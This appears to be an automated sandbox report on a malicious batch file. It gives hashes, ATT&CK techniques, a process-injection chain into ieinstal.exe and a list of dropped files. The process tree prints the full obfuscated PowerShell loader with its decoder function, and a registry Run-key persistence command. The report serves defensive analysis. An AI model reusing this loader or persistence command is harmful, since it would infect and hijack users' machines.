59fbfefc50c8f11efd9765dbef3cf36f2bb1a39edd4273414906017f1c69f7f6

General

Target

Run-VBS-1.bat
Size

26B
MD5

b7c4c74c2be103888999b98cabe11762
SHA1

72f9c3131b22688b6d9774f7d0e0bdf7af52fc1c
SHA256

aec5f3164db58aad2fed2cf82f64c64053656e2e7990318711646a12ef9f5287
SHA512

40d65b504b0b830fd5de0503f041d99fe0cfcecf864a8be63a7159676b29c4b535c4481dc3afa4d4c2b6f8cf7f8d453ffc2e39825953401c9aedd66e21b0f60e

Score

7^/10

persistence

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\Saltm = "%TORO% -w 1 $Disordi=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Netvrke;%TORO% ($Disordi)"	ieinstal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

ieinstal.exe

pid process

1568 ieinstal.exe
1568 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

276 powershell.exe
1568 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 276 set thread context of 1568 276 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

276 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

276 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 276 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ieinstal.exe

pid process

1568 ieinstal.exe

pid	process
1568	ieinstal.exe
1568	ieinstal.exe

pid	process
276	powershell.exe
1568	ieinstal.exe

description	pid	process	target process
PID 276 set thread context of 1568	276	powershell.exe	ieinstal.exe

pid	process
276	powershell.exe

pid	process
276	powershell.exe

description	pid	process
Token: SeDebugPrivilege	276	powershell.exe

pid	process
1568	ieinstal.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

cmd.execscript.exepowershell.execsc.exe

description	pid	process	target process
PID 1312 wrote to memory of 2044	1312	cmd.exe	cscript.exe
PID 1312 wrote to memory of 2044	1312	cmd.exe	cscript.exe
PID 1312 wrote to memory of 2044	1312	cmd.exe	cscript.exe
PID 2044 wrote to memory of 276	2044	cscript.exe	powershell.exe
PID 2044 wrote to memory of 276	2044	cscript.exe	powershell.exe
PID 2044 wrote to memory of 276	2044	cscript.exe	powershell.exe
PID 2044 wrote to memory of 276	2044	cscript.exe	powershell.exe
PID 276 wrote to memory of 1192	276	powershell.exe	csc.exe
PID 276 wrote to memory of 1192	276	powershell.exe	csc.exe
PID 276 wrote to memory of 1192	276	powershell.exe	csc.exe
PID 276 wrote to memory of 1192	276	powershell.exe	csc.exe
PID 1192 wrote to memory of 1772	1192	csc.exe	cvtres.exe
PID 1192 wrote to memory of 1772	1192	csc.exe	cvtres.exe
PID 1192 wrote to memory of 1772	1192	csc.exe	cvtres.exe
PID 1192 wrote to memory of 1772	1192	csc.exe	cvtres.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe
PID 276 wrote to memory of 1568	276	powershell.exe	ieinstal.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Run-VBS-1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\system32\cscript.exe
cscript.exe Client.vbs A C
2⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Derea = """StdATildApodGel-CraTLymyDompSyveAkt Shr-tilTCrayLogpFiseForDCloeSnifGyniFronTeliSkutSlgiMisoilsnReo Epo'FlauPresByoiUninFingUnp RedSGnoyPresEuptFedeudbmHea;ResuSelsBoliNatnAntgLej MobSBrayFissDabtindeafvmflo.KarROpsuKamnAbotMdeihypmPoreKod.ButIWinnsygtMareTanrPuboHalpBraSUdfeLetrNorvPlaikrecUnseSkesSem;asepSkyuBlabSmklRefiCuscSne StasDomtFacaNartTariBracsme MafcdemlParaIdksSrbsPri SdeTWourOplaMetcMonhTeleYojaBiltVreiVra1Dus Aut{Cin[OveDSellSamlFloIHekmSanpFluooxirUnltGyn(Kai`"""SnowElgiEacnMoomEydmCer.gardHewlPollNol`"""Ele)Frn]PorpKuruBydbTrolsekiPercPla NicsScltAaraDretCheiInfcRee UnbeAutxSuptmvheStirUndnTil WamiResnSertCit GummAnuiOzodSlsiJelOVanuAdrtAudRUndesposPuseAfftRes(PorilornMw tPrv NosHOrnahjtmHusaDin)Tal;dis[PenDLislParlAscINepmUnspratoPibrDemtToh(Ady`"""NonkUrgeFolrlasnHeteBeslMaq3Sla2Spa`"""Kan)Fod]DispUveuPenbBorlcasiParcSki EsksRritSamaRaatCurigrfcMis PaneTraxBastTroeInvrPyrnRip PuriPetnRmetFra AutSGrueBertPreULinnStrhPlaaMuhnDisdLanlCureUnrdWilEWasxAlccUdmeHeapOldtAnsiUreoInsnUroFSpriNeilspitSyneRenrBuk(knaiAabnViotIdr JamIDesnOvedFonbArnoOcc)Kir;Rif[LodDcrelDislUngIRasmPripLinoSpyrSamtPav(Amu`"""AllkRefecherPlenKaseDoclLat3Sky2Han`"""Sol)Sup]RkepLabuSchbFurlTitiTwicfin PlesNdutPlaaGentIntiNoncTil FrieDalxStrtcapeChlrTednPla PeniEvonAmbtCed PlaGBasePestEuhTHaviFiacOplkArcCcunoshauRhonKystLiq(Sta)Dyk;Phr[wayDTillHemlTreIGrumConpElioImprSkotHle(Bom`"""CoouMacsSkreDrirFre3Syn2Ung`"""Stt)Grs]DerpPreuKombBrolBuniRodcAbr IncsHngtLimaOvetpodiGalcAnd SkreBjlxKortPryeEftrvannDis SiliLannpaptUdd LeuIHusnspesHoeeKlvrDistDelMSubeZarnIntuTerIYoktTreeSpemSte(SemiExenBartSub AleDSpliTyrsObecTiloSocrMed,ImpiSinnEnmtEss SubfAntePrarAkt,MariIndnSpatPro CoeSDenuShacKla,AneiNonnStatPhy JarAmejrSlooImmmMedaCub)Fis;Gim[ModDPerlbejlVddIAusmHyppDenoSterGhotFas(Muc`"""GuduDissLiceLoarDra3Udr2Per.FjldTamlSkilGal`"""Moz)Apo]GrapHypuBaubAfslNapiChacLre HebsMentAusaSamtTeoiAfvcTea LigeTekxSaltTraeUverRounWid UniIBognSydtUnpPGartEksrFod OmnCAptasuplKatlDatWHaliHepnRygdColoSemwNonPSterRewoGarcUbeWNub(tobIHjenKomtbarPMagtAbsrPil StrPThrrPauoNarsRibeesslPliyEmi5Unm,antianinFlatTra PenPReirRekoUstsrepeEndlNasySan6Cou,PriiCounTiltUdl TigPIrrrGldoRemsSereMytlMonyBer7Hug,MaciblonBistSls elePVesrStooShisGaleReclRidySpu8She,EsciGoonFrotIvy ExgPBoorStioUnrsproeAnslForyUnd9Mez)for;Hip[freDUnslFillYelIDatmPlapBetobesrpretSer(Non`"""TrikendeMetrkodnSmaeBrulFod3Dag2Can`"""Sou)Ind]GrapSkeuSocbErslSiliMascUds VissStetSlaaProtSh iPoscSka TrieUntxPretUdgeThurSaynAnf MosiZoonDistEne OveCleirUdbeUnhaPoltouteAmiDSkiiBehrHypeVolcVistOpsoFrorForyBul(VeniUrinTaftWak CraMTilaTmmnBondMarrOil,ErriPernSittEmu SlaFTerrMamaStovCatrSirsDyn)Ste;Tje[SemDYvelAdalHypIBalmPalpArboDalrSertFli(Tre`"""CalkNodeDihrFalnLyreAablLnm3Ing2Und`"""Ste)Sug]DagpOveuKaibLanlOutihalcFej VissUnqtBrlaDoutfoliCoccApp frieQuaxCartStoeHobrSkunLum RepiBehnPoltNee EmpMKedoLitvOmveShiFFraiWerlMazeTerESkixgen(IroiFionHartjin ConCDefhHypoRadnDisdDiprCon,ForiFranFortPli NonBborahypgImmlJudyLib,BadiPsenGyrtAri UnrKPrioRntmSil)und;Vaa[NavDShrlElelColIPolmJerpStroGrnrFantEmb(Lun`"""ExowCapiSnanPromBromAfs.KondUltlDenlMer`"""Vit)For]lftpThouAfvbTunlSuliBalcOce UnasAnttAmtaTrotConiSupcIde MiseAmbxFyntKlueForrrdvnSmi ProiRulnmertOps RetmDolihaexLooeSenrNilCKoglstaoRhysVekehem(FamiunpnMettTox udsSKeroPolnCeleKoo)Bje;Ano[TryDBiglWralVidIPhomnovpleaoBrerElytCac(Pla`"""DodiGlymGrimAgg3Con2Hom.AlldMeglSanlWea`"""Ski)Iri]KlipHiruRambplalAbbiElscQua lonsFlotSunaUndtUneiRidcfll HypeTirxUnftLeuePrerAflnFor enaiResnVovtFra JudIDramdecmEtaGIndeDritToaVMetiVddrAcotScouAlbaPhyldagKFadeRanySno(YakiLamnTratMan SitSLynvKvleDhadForkDog)Bug;Mil[DepDStalKonlAfpIElemPinpUdboPrerBiotPaa(Yar`"""LdekRoneArbrResnMonePetlPse3Ure2Bas`"""saf)Tjr]PropPlaumisbDislTreiSnecapa TsnsDebtFejaCurtBlaiEtycRam UndetanxUnetSmaeradrPranEdu ExtiAbjnKantSmr DefVMesiBonrKohtBiguKriathelrefARealTunlAbsoDeccrev(SubiCarnSprtAce ForvEve1Und,faniAuknRastFor ProvSik2Kne,OpviWignProtRef HemvMak3Spe,CadiUdlnPretMot penvBud4Sek)For;Sci[RulDKuvlJoklradIRommHirpNoroBlirSvitMon(Pns`"""PrewPoriGranBarsThipForoGenoOvelEsk.InsdMoarInevUnc`"""Glg)Non]KafpAquuTrabRedlpteiHovcLod FrosReftBaaaPentLoviTracSup LaneRykxBrutSokeHomrFornDem KatiBudnContArs ArcDAareVaglprieDamtReveXylPMrkrOmniPrenSlatProePhyrKalCPreoConnTranruteAnscStetPeriDeboAllnNon(KaliTranLyntGer VelTopgiStilUomrDat)Fje;Mon[ExhDunilGenlDelITygmBobpophoHrirBiltCri(Ren`"""PaauThrsSpreAalrBnn3und2Wan`"""Sch)Hie]PsepMamuFajbBirlColiTracTea SunsDdetMalaBedtAesiTrucEnv NedeJouxBlutskaeKasrBasnTus FrdichenUintMon encASubtFortDevaBamcCrahCroTForhhearOpieHalaTegdTipITernUdepQuouGartBro(UnsiSinnStatDis OphGPeaoskakStr,spailatnAvetmon OverFakiphogMenhban,UnbiPacnJamtBal VisTPhleTumkFis)Pre;Hjr[MorDFlolTrilPinITipmovepBogoKasrVogtAfs(For`"""ForuNubsPluePhyrPhe3Pru2Sug`"""Des)Ami]AnspUleuBinbForlPeriBescsle BansBiltTeaaradtTekiFodcTra TileBekxSyntbiteQuirRumnQua DagiDefnMistFor NecISornIgavAceaDemlSeliPubdGodaIndtTheeVirRReneTwicCostEks(OveiPahnAfstTac ReiCEksoretvOkseOve,FabiAttnUnstRen SalVJoraUdblOpkdrekeUng,RrliacenBantUdl ParIStulTruysausAssiSca)ped;Elm}Vis'Xer;Cou`$RedTBagrTilaBndcProhnejeOleaMontForiDru2Uds=Kva`$StreSecnClivIns:MaatTraeTilmEngpAkh Sar+ang Cha`"""duk\SaaGSolrAlgaskrnGna.MildPaaaLantVil`"""Sko;Acr`$AmaLLevnBotkTaxeNidrAhasNeusGuetEureSchrCel Acc=Imp KorGForepibtpri-farCcryoPopnMultCareTitnKrutViv Pri`$OplTdigrAmoaGencUnphDifemacaBlutpauiinv2Fro;Amb`$VanBFlgeUnisInvvCouoUopgAdfrChueStadVil Sel=Opb Col[KapSRepyPresChotPapeKukmMal.PreCRetoImbnflbvForeMinrKontGal]Kni:vas:TelFAccrcaroPramHowBSpuaBacscomePan6Spl4hedSFretIndrEnsiFennBragCle(ski`$MelLNamnSlakcareSuprHunsForsUnbtSameCaprBut)Tut;upd`$AkvTRivrRolaSlacudkhaareBetaNontretiDum3Rea=Egl[GavTVarrTaraHancTrihMuneUnpaDiatPhyiBru1Eve]Ash:Rom:RevVDisiMyxrTrotAnmuBasaBetlBesATellHanlbaioFaccSpo(enk0Bol,Chl1Adm0Men4Ren8Sko5Hel7til6Sar,Dis1Dyn2Tal2Pro8The8Kar,Sen6ver4Eft)Lac;Sub[PanSFamyShrsSkitbabeUdlmPro.TimRRecuFrenSkitBooiMarmInteama.AftIZannAfptDeneGifrannoBespNeuSConeWoorTohvFamiSticMoneSnosSnn.BemMAkvaAugrTiesStrhBrkaDialSiv]Pro:Mon:SinCtapoKrnpLivyBla(Uno`$appBNosekansBedvCyboTangLearBefeSpadCyp,Bnd Hus0Rec,ary Vap Cub`$CanTLobrMaraHazcReshPapeForaUdstSkiiCru3The,Ker Kvr`$OpbBSchestusSonvPreoBergPrerForeSpydLor.UnscSlooKlauNonncaltLil)Dau;Lev[HysTIndrTooaStacFlahGameBloaasctUnliflo1Gra]Uku:Ave:amiCPolaUndlabnlCerWoveiSubnRavdUdboStawSolPBalrAnioSyncuniWVis(Tmr`$AutTCharAdiaRekcUnrhLaceBacaPantMariIag3Dre,Fir Oms0Nos,Bev0Lde,Kop0Udl,Non0Ind)Taf#Kil;""";Function Tracheati4 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Prosely = $Prosely + $HS.Substring($i, 1); } $Prosely;}$symbiosens0 = Tracheati4 'CitIAmpEHeaXSco ';$symbiosens1= Tracheati4 $Derea;& ($symbiosens0) $symbiosens1;"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:276

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jr3mynp3.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71A9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7198.tmp"
5⤵
PID:1772

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1568

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Gran.dat

Filesize
145KB

MD5
f8aa322d9439db5928769bbe829f3072

SHA1
965728def507bf74d495aaae6a67dec68e5a3355

SHA256
4c1a9a92d1f77a38d54b9fb583d905cbdb81362e3dc79dbec7a6477ae6463d08

SHA512
163db7c96d2739435e65367e18dca23a4c1426061d8df44a4a6b6ddcdd016a613169a6fe91786f46c7f1f3f60422a31bed1d23960418ec2d9a3b145fd87ee0ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES71A9.tmp

Filesize
1KB

MD5
6b639c8d04405201249151c2b09ea618

SHA1
23dd80426c81c632433d95dc8bc162cca5ef4448

SHA256
51201c7f0818d2126782c6a9f9a859b891c1e9e628b0f377b1ce177bb31f1087

SHA512
fddf3570cb1af67ad1f3855ec31c488db2a3da3ca2dca532d15e796ad2f05a598a7118869f0466e18b9afe7514fa57e31519814967c160df00a03c8e64cebc25

Download Submit
C:\Users\Admin\AppData\Local\Temp\jr3mynp3.dll

Filesize
4KB

MD5
9d9f584d6532f3c52c2f25d52466379e

SHA1
732e0f61dda0c01d8f542b515042169db3d20461

SHA256
9c778497e98bd819cf286838e6e919fbb3a059367b3d96dde79be051c167eb29

SHA512
cd93f0cc93701658c51d4f1fb668dad3e3bdeb1354bcf7f3786d3f6f8f2e918ca0a475e3910475644d094e61f93e3b2079f8e63e5a819359223dcfab2e5af994

Download Submit
C:\Users\Admin\AppData\Local\Temp\jr3mynp3.pdb

Filesize
7KB

MD5
a92df49c66e38ed85c6836f8d83c68be

SHA1
3d022e9da3754353a2f4004502d374c6a1df2313

SHA256
d601f61fa4c9d87ffac5e2262b166b2817d1a72f4351b70523aedfc1b707842b

SHA512
ca4a7ca15fcb180bf6bd480a3d2599a61d2fb8fa9017e87ae640b5f7b787dc9c9c6ed46116fd3879feb43a42027a713353e69106bf815e56b4cd52fdd4e83f8f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7198.tmp

Filesize
652B

MD5
b31ec797043db364596f19ee701dcb9e

SHA1
9146b80c274594d63491672ca9a8c0178a2f2ad2

SHA256
22d9c551a14310c0b3f1d4bb8fa9df3da47b8f062327ed31402c7e170f3e2cd5

SHA512
dedc499b76323e3cb57a2c2bbe8de576c9c37ee38e1ac3fd7ec33b5d1fe0a7d228ccee9ce67a8d628c992a99c30fb1752238b8f7e769c569904165fa154539cd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jr3mynp3.0.cs

Filesize
1KB

MD5
d4de9651ff0de82d29338c81aa6e5885

SHA1
acec3aa0a3d399927828f4975e5193a2727c7aa8

SHA256
d70e9a0ad03b8c827666c59d74addc16a72244a73ae85fe9a10bf5ea0cf4d5d5

SHA512
458333575625e306dac458b1274d7db85ea023d84f8fc958cdc41a2b65bb5192fa6f581348eb6b20ba1db10c635bbe18d1bc80fe2e4aeccdb76d1971b753a283

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jr3mynp3.cmdline

Filesize
309B

MD5
91d282754fd65bc247bc93f874b6c428

SHA1
8e280f8676b9db42266dbf649e522df7f7556959

SHA256
e9d2f1b85418b8e1b44314726125cb0fc481c1cfe247b89456088e07b9870d79

SHA512
47605f73e5eead8b33af8450abb6ecbae0fe0f13908543027b4434da72614d845e98fa47d7deaecd88b1a373e84e0018787d741367a16921e0fb824f5fc18dfc

Download Submit
memory/276-68-0x00000000050B0000-0x00000000051B0000-memory.dmp

Filesize
1024KB

Download
memory/276-86-0x00000000050B0000-0x00000000051B0000-memory.dmp

Filesize
1024KB

Download
memory/276-76-0x0000000077AE0000-0x0000000077C60000-memory.dmp

Filesize
1.5MB

Download
memory/276-58-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/276-57-0x0000000075BA1000-0x0000000075BA3000-memory.dmp

Filesize
8KB

Download
memory/276-56-0x0000000000000000-mapping.dmp

Download
memory/276-87-0x0000000077AE0000-0x0000000077C60000-memory.dmp

Filesize
1.5MB

Download
memory/276-77-0x0000000077AE0000-0x0000000077C60000-memory.dmp

Filesize
1.5MB

Download
memory/276-69-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/276-70-0x00000000050B0000-0x00000000051B0000-memory.dmp

Filesize
1024KB

Download
memory/276-80-0x0000000077AE0000-0x0000000077C60000-memory.dmp

Filesize
1.5MB

Download
memory/276-79-0x0000000077AE0000-0x0000000077C60000-memory.dmp

Filesize
1.5MB

Download
memory/276-75-0x0000000077900000-0x0000000077AA9000-memory.dmp

Filesize
1.7MB

Download
memory/1192-59-0x0000000000000000-mapping.dmp

Download
memory/1568-74-0x0000000000090000-mapping.dmp

Download
memory/1568-78-0x0000000000090000-0x0000000000190000-memory.dmp

Filesize
1024KB

Download
memory/1568-81-0x0000000000090000-0x0000000000190000-memory.dmp

Filesize
1024KB

Download
memory/1568-73-0x0000000000090000-0x0000000000190000-memory.dmp

Filesize
1024KB

Download
memory/1568-85-0x0000000077900000-0x0000000077AA9000-memory.dmp

Filesize
1.7MB

Download
memory/1772-62-0x0000000000000000-mapping.dmp

Download
memory/2044-54-0x0000000000000000-mapping.dmp

Download
memory/2044-55-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads